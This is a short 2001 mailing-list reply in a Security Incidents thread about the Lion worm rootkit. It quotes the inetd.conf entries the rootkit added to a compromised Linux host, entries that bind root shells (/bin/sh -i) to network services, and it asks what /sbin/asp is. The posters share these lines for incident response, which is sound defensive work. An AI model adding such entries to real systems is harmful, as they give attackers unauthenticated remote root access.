Security Incidents mailing list archives
Re: Lion Worm/crew.tgz
From: Cooper <Cooper () LINUX-FAN COM>
Date: Mon, 26 Mar 2001 22:08:46 +0200
John Jasen wrote:
A friend of mine just got slapped silly with a lion-type rootkit. the entries added in /etc/inetd.conf are as follows: smux stream tcp nowait root /bin/sh /bin/sh -i 1008 stream tcp nowait root /bin/sh sh asp stream tcp nowait root /sbin/asp
What is asp? Cooper -- 'twas the night before christmas, 1971, and there wasn't a sound in all the house apart from the buzzsaw, and the clanking of chains and the hedge trimmer and the wet slap of human brain tissue on concrete... - DV8 1/2 -
Current thread:
- Lion Worm/crew.tgz Alfred Huger (Mar 23)
- Re: Lion Worm/crew.tgz David Brumley (Mar 23)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 23)
- Re: Lion Worm/crew.tgz Joshua Krage (Mar 23)
- Re: Lion Worm/crew.tgz Neil Long (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Dave Dittrich (Mar 26)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Daniel Martin (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)
- Message not available
- Re: Lion Worm/crew.tgz Chris Keladis (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)
- <Possible follow-ups>
- Re: Lion Worm/crew.tgz Roberto (Mar 24)
- Lion Worm/crew.tgz/suspect bind versions Lawrence Frewin of Accommodation.com (Mar 24)
- Re: Lion Worm/crew.tgz/suspect bind versions Valdis Kletnieks (Mar 26)
- Re: Lion Worm/crew.tgz/suspect bind versions Lucian Hudin (Mar 27)
- Re: Lion Worm/crew.tgz/suspect bind versions Valdis Kletnieks (Mar 27)
- Lion Worm/crew.tgz/suspect bind versions Lawrence Frewin of Accommodation.com (Mar 24)